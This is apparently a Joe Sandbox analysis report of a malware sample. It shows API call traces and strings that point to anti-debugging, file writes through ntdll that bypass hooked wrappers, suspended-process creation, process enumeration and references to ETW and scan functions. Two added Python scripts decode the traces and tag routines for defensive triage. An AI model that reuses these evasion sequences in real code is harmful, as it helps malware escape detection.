                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02C75B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C75B37
                                        • RegQueryValueExA.ADVAPI32(?,02C75CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02C75B7D,?,80000001), ref: 02C75B55
                                        • RegCloseKey.ADVAPI32(?,02C75B84,00000000,00000000,00000005,00000000,02C75B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C75B77
                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C75B94
                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02C75BA1
                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02C75BA7
                                        • lstrlen.KERNEL32(00000000), ref: 02C75BD2
                                        • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02C75C19
                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02C75C29
                                        • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02C75C51
                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02C75C61
                                        • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02C75C87
                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02C75C97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                        • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                        • API String ID: 1759228003-3917250287
                                        • Opcode ID: 564db707730630ef2b864df15379ae6b5c78e9f84d3c5d929d81b39b8a179cda
                                        • Instruction ID: 7288f14fa6640d5259336a3f0f65ce3746f7c28728a4f1bfba5985f0f55c0b83
                                        • Opcode Fuzzy Hash: 564db707730630ef2b864df15379ae6b5c78e9f84d3c5d929d81b39b8a179cda
                                        • Instruction Fuzzy Hash: 56518571E4024C7EFB25D6A4CC46FEF7BAD9B48784F8401A5AA04E61C1DBB49B449FA0

                                        Control-flow Graph

                                        APIs
                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02C8DB0B
                                        • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02C8DB72
                                        • NtClose.NTDLL(?), ref: 02C8DB7B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: Path$CloseFileNameName_Write
                                        • String ID:
                                        • API String ID: 1792072161-0
                                        • Opcode ID: 4bd64617c7b15beae0a9915888d9b8e870c4840db91375e51c49fec15a05b748
                                        • Instruction ID: 9fc5cff668823b4bdf9e4b499a25324f1516ab2c46fa5c559745196986c0b2e1
                                        • Opcode Fuzzy Hash: 4bd64617c7b15beae0a9915888d9b8e870c4840db91375e51c49fec15a05b748
                                        • Instruction Fuzzy Hash: 8021ED71A40308BAEB24EAE4CC46FEEB7BDEB04B04F604161B601F71C0D7B06A04DB65

                                        Control-flow Graph

                                        APIs
                                        • RtlInitUnicodeString.NTDLL ref: 02C8DA6C
                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02C8DA82
                                        • NtDeleteFile.NTDLL(?), ref: 02C8DAA1
                                          • Part of subcall function 02C74C0C: SysFreeString.OLEAUT32(?), ref: 02C74C1A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: PathString$DeleteFileFreeInitNameName_Unicode
                                        • String ID:
                                        • API String ID: 2256775434-0
                                        • Opcode ID: 81ea543f968e6ca68a3241f3ad7544262ccd144831241da713b8483d63bd6248
                                        • Instruction ID: cfad5da123f1e33068cc3b7f47d2edb6cfaff18883fe1a60b8654ab15f7ca81b
                                        • Opcode Fuzzy Hash: 81ea543f968e6ca68a3241f3ad7544262ccd144831241da713b8483d63bd6248
                                        • Instruction Fuzzy Hash: 9F01E171944208BADB15FAE0CD51FDEB7BDEB48B14F614471A501E2180EB746B049B64
                                        APIs
                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02C8DBEB
                                        • NtClose.NTDLL(?), ref: 02C8DC65
                                          • Part of subcall function 02C74C0C: SysFreeString.OLEAUT32(?), ref: 02C74C1A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: Path$CloseFreeNameName_String
                                        • String ID:
                                        • API String ID: 11680810-0
                                        • Opcode ID: cac9a03b5778d1937095da60ceca8210b340dd98a2daa873efbb7f73e8e5799b
                                        • Instruction ID: 9e1255c1b7ef153764cf9437209bbf13b0b7d60e8179a9ee9914d1e5dbc10eff
                                        • Opcode Fuzzy Hash: cac9a03b5778d1937095da60ceca8210b340dd98a2daa873efbb7f73e8e5799b
                                        • Instruction Fuzzy Hash: 3B21F171A50308BAEB15FAE4CC46FDEB7BDEB08B04F504561B601F71C0D6B4AA449B65

                                        Control-flow Graph

                                        Control-flow graph (blocks 2c97877 to 2c9aa25): a long straight-line body made almost entirely of repeated calls to 2c7480c, 2c7494c, 2c746a4, 2c74798 and 2c88824. CreateProcessAsUserW sits at the end of block 2c97c6d-2c97e40 (after calls to 2c74d20 and 2c74d9c); ResumeThread and two CloseHandle calls are in block 2c98309-2c98aec, which also calls 2c87ed4 and 2c887a0 six times; block 2c98f68-2c99215 calls 2c74d8c twice, 2c74734 and 2c8dacc; block 2c9921a-2c9941b calls 2c749a4 and 2c88bb0; block 2c98c8f-2c98f62 calls 2c8e540 and 2c77e18; ExitProcess ends block 2c99420-2c9aa25 after calls to 2c87b98 and 2c8818c.
                                        APIs
                                          • Part of subcall function 02C88824: FreeLibrary.KERNEL32(02CD1384,00000000,02CD1388,Function_000055D8,00000004,02CD1398,02CD1388,05F5E0FF,00000040,02CD139C,02CD1384,00000000,00000000,00000000,00000000,02C8890B), ref: 02C888EB
                                        • CreateProcessAsUserW.ADVAPI32(02DC57D8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02DC57DC,02DC5820,OpenSession,02CCCE80,02C9AFD8,UacScan,02CCCE80), ref: 02C97E39
                                        • ResumeThread.KERNEL32(02DC5824,ScanBuffer,02CCCE80,02C9AFD8,OpenSession,02CCCE80,02C9AFD8,UacScan,02CCCE80,02C9AFD8,ScanBuffer,02CCCE80,02C9AFD8,OpenSession,02CCCE80,02C9AFD8), ref: 02C98483
                                        • CloseHandle.KERNEL32(02DC5820,ScanBuffer,02CCCE80,02C9AFD8,OpenSession,02CCCE80,02C9AFD8,UacScan,02CCCE80,02C9AFD8,02DC5824,ScanBuffer,02CCCE80,02C9AFD8,OpenSession,02CCCE80), ref: 02C98602
                                          • Part of subcall function 02C887A0: LoadLibraryW.KERNEL32(?,?), ref: 02C887B4
                                          • Part of subcall function 02C887A0: GetProcAddress.KERNEL32(02CD1390,BCryptVerifySignature), ref: 02C887CE
                                          • Part of subcall function 02C887A0: FreeLibrary.KERNEL32(02CD1390,02CD1390,BCryptVerifySignature,bcrypt,?,02CD13D0,00000000,02CD13A4,02C8A3C7,ScanString,02CD13A4,02C8A77C,ScanBuffer,02CD13A4,02C8A77C,Initialize), ref: 02C8880A
                                        • CloseHandle.KERNEL32(02DC5820,02DC5820,ScanBuffer,02CCCE80,02C9AFD8,UacInitialize,02CCCE80,02C9AFD8,ScanBuffer,02CCCE80,02C9AFD8,OpenSession,02CCCE80,02C9AFD8,UacScan,02CCCE80), ref: 02C989F4
                                          • Part of subcall function 02C8DACC: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02C8DB0B
                                          • Part of subcall function 02C8DACC: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02C8DB72
                                          • Part of subcall function 02C8DACC: NtClose.NTDLL(?), ref: 02C8DB7B
                                          • Part of subcall function 02C8818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02C88216), ref: 02C881F8
                                        • ExitProcess.KERNEL32(00000000,OpenSession,02CCCE80,02C9AFD8,ScanBuffer,02CCCE80,02C9AFD8,Initialize,02CCCE80,02C9AFD8,00000000,00000000,00000000,ScanString,02CCCE80,02C9AFD8), ref: 02C9AA25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: CloseLibrary$FreeHandlePathProcess$AddressCacheCreateExitFileFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                        • API String ID: 376050052-1225450241
                                        • Opcode ID: 3668a8f33b12cfe72e2834338013b5c9a2d05b92b701b6ea41f5b5ab7f193a27
                                        • Instruction ID: 41c413fa018082d58aa864918414af2ce486dcfcd21e70b5b88d374fc9b2b005
                                        • Opcode Fuzzy Hash: 3668a8f33b12cfe72e2834338013b5c9a2d05b92b701b6ea41f5b5ab7f193a27
                                        • Instruction Fuzzy Hash: BC432BB5B901589BCF25EB68DD809DE73BAFF89304F5041E5E009AB610DB31AE85EF50
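                                        The argument lists printed under APIs are raw stack dumps: positional, hexadecimal, and padded with stale slots beyond the function's arity, which is where hand triage goes wrong. The following is an added example for reading this report (not code from the Joe Sandbox report, the sandbox, or the sample) that maps those positions onto the SDK parameter names and decodes the flag words. Its sample input copies lines from this page: the Software\Borland\Locales routine at 02C75A78, which is the Delphi RTL's resource-module lookup (HKCU and HKLM Software\Borland\Locales, GetLocaleInfoA with LCType 3 = LOCALE_SABBREVLANGNAME, LoadLibraryExA with dwFlags 2 = LOAD_LIBRARY_AS_DATAFILE), and the CreateProcessAsUserW call at 02C97E39, whose seventh argument 00000004 is dwCreationFlags = CREATE_SUSPENDED, consistent with the ResumeThread at 02C98483 later in the same function. One caveat worth knowing: the access mask 000F0019 passed to RegOpenKeyExA is not the SDK's KEY_READ (0x00020019); it is STANDARD_RIGHTS_REQUIRED plus KEY_QUERY_VALUE, KEY_ENUMERATE_SUB_KEYS and KEY_NOTIFY, the value this Delphi routine passes. Parameter names and constants are taken from the Win32 headers; the function names and the prototype table are my own.

```python
"""Decode the positional argument dumps in Joe Sandbox 'APIs' lines.

Added example for reading this report; not code from the sandbox or the sample.
Parameter names and constants come from the Win32 headers (winreg.h, winnt.h,
winnls.h, libloaderapi.h, processthreadsapi.h); function names are my own."""
import re

# Constructed sample input: four lines copied from the report above. The sandbox
# prints the raw stack, so values beyond a prototype's arity are stale slots.
REPORT_LINES = [
    "RegOpenKeyExA.ADVAPI32(80000001,Software\\Borland\\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C75AB2",
    "GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02C75BA7",
    "LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02C75C29",
    "CreateProcessAsUserW.ADVAPI32(02DC57D8,00000000,00000000,00000000,00000000,00000000,00000004,"
    "00000000,00000000,02DC57DC,02DC5820,OpenSession,02CCCE80,02C9AFD8,UacScan,02CCCE80), ref: 02C97E39",
]

# Parameter names in SDK order; only the prototypes this page needs.
PROTOTYPES = {
    "RegOpenKeyExA": ["hKey", "lpSubKey", "ulOptions", "samDesired", "phkResult"],
    "GetLocaleInfoA": ["Locale", "LCType", "lpLCData", "cchData"],
    "LoadLibraryExA": ["lpLibFileName", "hFile", "dwFlags"],
    "CreateProcessAsUserW": [
        "hToken", "lpApplicationName", "lpCommandLine", "lpProcessAttributes",
        "lpThreadAttributes", "bInheritHandles", "dwCreationFlags", "lpEnvironment",
        "lpCurrentDirectory", "lpStartupInfo", "lpProcessInformation",
    ],
}

# Exact-value names (one constant per value) and OR-able bit-flag names.
ENUMS = {
    ("RegOpenKeyExA", "hKey"): {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"},
    ("GetLocaleInfoA", "LCType"): {0x3: "LOCALE_SABBREVLANGNAME"},
}
BITFLAGS = {
    ("RegOpenKeyExA", "samDesired"): {
        0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
        0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
        0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC",
        0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE",
    },
    ("LoadLibraryExA", "dwFlags"): {
        0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
        0x8: "LOAD_WITH_ALTERED_SEARCH_PATH",
    },
    ("CreateProcessAsUserW", "dwCreationFlags"): {
        0x1: "DEBUG_PROCESS", 0x2: "DEBUG_ONLY_THIS_PROCESS", 0x4: "CREATE_SUSPENDED",
        0x8: "DETACHED_PROCESS", 0x10: "CREATE_NEW_CONSOLE", 0x200: "CREATE_NEW_PROCESS_GROUP",
        0x400: "CREATE_UNICODE_ENVIRONMENT", 0x80000: "EXTENDED_STARTUPINFO_PRESENT",
        0x8000000: "CREATE_NO_WINDOW",
    },
}

LINE_RE = re.compile(
    r"^\s*•?\s*(?P<func>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\)"
    r"(?:,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)


def parse_line(line):
    """Split one API line into (function, module, raw argument list, call-site address)."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    args = m["args"].split(",") if m["args"] else []
    ref = int(m["ref"], 16) if m["ref"] else None
    return m["func"], m["mod"], args, ref


def decode_value(func, name, raw):
    """Return an int, a flag string, or the literal the sandbox printed ('?' or a string).
    Caveat: a string literal made only of hex digits is indistinguishable from a number."""
    try:
        value = int(raw, 16)
    except ValueError:
        return raw
    enum = ENUMS.get((func, name))
    if enum and value in enum:
        return enum[value]
    bits = BITFLAGS.get((func, name))
    if bits:
        names = [n for b, n in bits.items() if value & b]
        rest = value & ~sum(bits)          # bits the table does not know
        if rest:
            names.append(f"0x{rest:X}")
        return "|".join(names) if names else "0"
    return value


def decode_call(line):
    """Pair each positional argument with its SDK name; stale slots past the arity are dropped."""
    func, mod, args, ref = parse_line(line)
    names = PROTOTYPES.get(func, [])
    params = {n: decode_value(func, n, a) for n, a in zip(names, args)}
    return {"function": func, "module": mod, "ref": ref, "params": params}


if __name__ == "__main__":
    for line in REPORT_LINES:
        call = decode_call(line)
        print(f"{call['function']} @ {(call['ref'] or 0):08X}")
        for name, value in call["params"].items():
            shown = f"0x{value:X}" if isinstance(value, int) else value
            print(f"    {name:<22} {shown}")
```

                                        Unknown functions decode to an empty parameter map rather than an error, so the script can be run over a whole APIs section and only the prototypes of interest get named output.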

                                        Control-flow Graph

                                        Control-flow graph (blocks 2c8ebf0 to 2c8ec3e): GetModuleHandleW; if that succeeds, GetProcAddress; if that succeeds, CheckRemoteDebuggerPresent (block 2c8ec20-2c8ec30, with a result-setting block at 2c8ec32); every path converges on 2c8ec36.
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 02C8EC00
                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02C8EC12
                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C8EC29
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                        • API String ID: 35162468-539270669
                                        • Opcode ID: 13a5f383cb6a1a8bbcf428519de700b82180447b07fc7e6f6af088c6cac10105
                                        • Instruction ID: f23f041a1f8d0a15380474b24e92a784375b0844f53b35c482ebbd49f4d47afa
                                        • Opcode Fuzzy Hash: 13a5f383cb6a1a8bbcf428519de700b82180447b07fc7e6f6af088c6cac10105
                                        • Instruction Fuzzy Hash: A5F0A070D0464CAAEB22B7A888897DDFBAD6B0532CFA483A4F534621C1E7750784C651

                                        Control-flow Graph

                                        Control-flow graph (blocks 2c71a8f to 2c71c6b, with a detour through 2c716e8-2c71723): two Sleep loops (blocks 2c71b13-2c71b38 and 2c71b4b-2c71b68), VirtualFree in blocks 2c716e8 and 2c71c00, and calls to 2c71644, 2c714c0, 2c71500 and 2c71560.
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 02C71B17
                                        • Sleep.KERNEL32(0000000A,00000000), ref: 02C71B31
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 45779180e7b3ca493208e68264fdadcfe1d2d8dbf8bcd369d61514a1a3ed35eb
                                        • Instruction ID: f783dfde58ec23338b9dd34be6f18c108ec231270a3c73be1f4fdeea6e2bbfa7
                                        • Opcode Fuzzy Hash: 45779180e7b3ca493208e68264fdadcfe1d2d8dbf8bcd369d61514a1a3ed35eb
                                        • Instruction Fuzzy Hash: D651F1B16103408FE715CF68C984756BBD0EB86324F2C86AED44CCB282E7F0D645CBA1
                                        APIs
                                          • Part of subcall function 02C8A95C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C8ABE3,?,?,02C8AC75,00000000,02C8AD51), ref: 02C8A970
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C8A988
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C8A99A
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C8A9AC
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C8A9BE
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C8A9D0
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C8A9E2
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C8A9F4
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C8AA06
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C8AA18
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C8AA2A
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C8AA3C
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C8AA4E
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C8AA60
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C8AA72
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C8AA84
                                          • Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C8AA96
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,02C8AC75,00000000,02C8AD51), ref: 02C8ABE9
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2317904880.0000000002C71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_2c71000_Wnbcdrjt.jbxd
                                        Similarity
                                        • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 2242398760-0
                                        • Opcode ID: f7d81002eca7dc259a61c74374902e198e9149dc6e230d76eee5f454636a7697
                                        • Instruction ID: 29cdb883cdfa778b80dede38c9ef74a8e8cc1b98be1d03a9d158246b49e57626
                                        • Opcode Fuzzy Hash: f7d81002eca7dc259a61c74374902e198e9149dc6e230d76eee5f454636a7697
                                        • Instruction Fuzzy Hash: DBC08CA26022301B8B107AF83C889D3578DCE891BA30888A3B609D3102E7698C10A2B0
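                                        Several of the small routines on this page are unremarkable one call at a time and only become meaningful as ordered sequences: the routine at 2c8ebf0 resolves CheckRemoteDebuggerPresent from KernelBase with GetProcAddress before calling it on FFFFFFFF (the current-process pseudo-handle); 02C8DACC and the routine at 02C8DA6C reach NtWriteFile and NtDeleteFile through RtlDosPathNameToNtPathName_U, bypassing the kernel32 wrappers (WriteFile, DeleteFileW) that API-monitor tools and some user-mode hooks instrument; the 02C97877 routine creates a process with CreateProcessAsUserW and later calls ResumeThread; and the two Toolhelp32 blocks (this one and the Process32First one that follows) resolve their imports at run time through 02C8A95C before using them. The following is an added example, not code from the report or the sample, that tags each routine's API list with ordered-subsequence rules (the calls must appear in order, gaps allowed) and records the call site at which each rule completes. The sample input copies this page's lines with long stale-stack argument tails trimmed; the rule names and the fn@ labels (keyed by the routine's first call-site address) are my own.

```python
"""Tag per-routine API lists from a Joe Sandbox report with ordered-sequence rules.

Added example for triaging this report; not code from the sandbox or the sample.
Rule names and the fn@ labels are my own."""
import re
from typing import List, NamedTuple, Optional, Tuple


class Call(NamedTuple):
    func: str
    module: str
    args: List[str]
    via: Optional[str]   # subcall address when the line says "Part of subcall function"
    ref: Optional[int]   # call-site address from "ref:"


# Constructed sample: lines copied from the report, argument tails trimmed.
FUNCTIONS = {
    "fn@02C8EBF0": [
        "GetModuleHandleW.KERNEL32(KernelBase), ref: 02C8EC00",
        "GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02C8EC12",
        "CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C8EC29",
    ],
    "fn@02C8DACC": [
        "RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02C8DB0B",
        "NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02C8DB72",
        "NtClose.NTDLL(?), ref: 02C8DB7B",
    ],
    "fn@02C8DA6C": [
        "RtlInitUnicodeString.NTDLL ref: 02C8DA6C",
        "RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02C8DA82",
        "NtDeleteFile.NTDLL(?), ref: 02C8DAA1",
        "Part of subcall function 02C74C0C: SysFreeString.OLEAUT32(?), ref: 02C74C1A",
    ],
    "fn@02C97877": [
        "CreateProcessAsUserW.ADVAPI32(02DC57D8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02DC57DC,02DC5820), ref: 02C97E39",
        "ResumeThread.KERNEL32(02DC5824), ref: 02C98483",
        "CloseHandle.KERNEL32(02DC5820), ref: 02C98602",
        "ExitProcess.KERNEL32(00000000), ref: 02C9AA25",
    ],
    "fn@02C8ABE9": [
        "Part of subcall function 02C8A95C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C8A970",
        "Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C8A988",
        "CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C8ABE9",
    ],
    "fn@02C8AC09": [
        "Part of subcall function 02C8A95C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C8A9F4",
        "Process32First.KERNEL32(?,00000128), ref: 02C8AC09",
    ],
}

CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<via>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"            # RtlInitUnicodeString is printed without arguments
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)


def parse_calls(lines: List[str]) -> List[Call]:
    """Keep only lines that look like API calls; hashes and metadata lines are skipped."""
    calls = []
    for line in lines:
        m = CALL_RE.match(line)
        if not m:
            continue
        args = m["args"].split(",") if m["args"] else []
        ref = int(m["ref"], 16) if m["ref"] else None
        calls.append(Call(m["func"], m["mod"].upper(), args, m["via"], ref))
    return calls


# A step is (API name, substring that must occur in one of its arguments, or None).
Step = Tuple[str, Optional[str]]
RULES = {
    "anti-debug: CheckRemoteDebuggerPresent resolved at run time and called":
        [("GetProcAddress", "CheckRemoteDebuggerPresent"), ("CheckRemoteDebuggerPresent", None)],
    "file write through ntdll only (kernel32 WriteFile never called)":
        [("RtlDosPathNameToNtPathName_U", None), ("NtWriteFile", None), ("NtClose", None)],
    "file delete through ntdll only (kernel32 DeleteFile never called)":
        [("RtlDosPathNameToNtPathName_U", None), ("NtDeleteFile", None)],
    "child process created then resumed (inspect dwCreationFlags for CREATE_SUSPENDED)":
        [("CreateProcessAsUserW", None), ("ResumeThread", None)],
    "Toolhelp32 snapshot taken via run-time-resolved import":
        [("GetProcAddress", "CreateToolhelp32Snapshot"), ("CreateToolhelp32Snapshot", None)],
    "process list walked via run-time-resolved Process32First":
        [("GetProcAddress", "Process32First"), ("Process32First", None)],
}


def match_rule(calls: List[Call], steps: List[Step]) -> Optional[Call]:
    """Return the call that completes the rule (steps matched in order, gaps allowed), else None."""
    pos = 0
    for call in calls:
        func, needle = steps[pos]
        if call.func == func and (needle is None or any(needle in a for a in call.args)):
            pos += 1
            if pos == len(steps):
                return call
    return None


def tag_function(lines: List[str]) -> List[Tuple[str, Optional[int]]]:
    """All rules a routine satisfies, each with the call-site address where it completed."""
    calls = parse_calls(lines)
    hits = []
    for name, steps in RULES.items():
        done = match_rule(calls, steps)
        if done is not None:
            hits.append((name, done.ref))
    return hits


def tag_report(functions):
    return {label: tag_function(lines) for label, lines in functions.items()}


if __name__ == "__main__":
    for label, hits in tag_report(FUNCTIONS).items():
        for name, ref in hits:
            print(f"{label}: {name} (completed at {(ref or 0):08X})")
```

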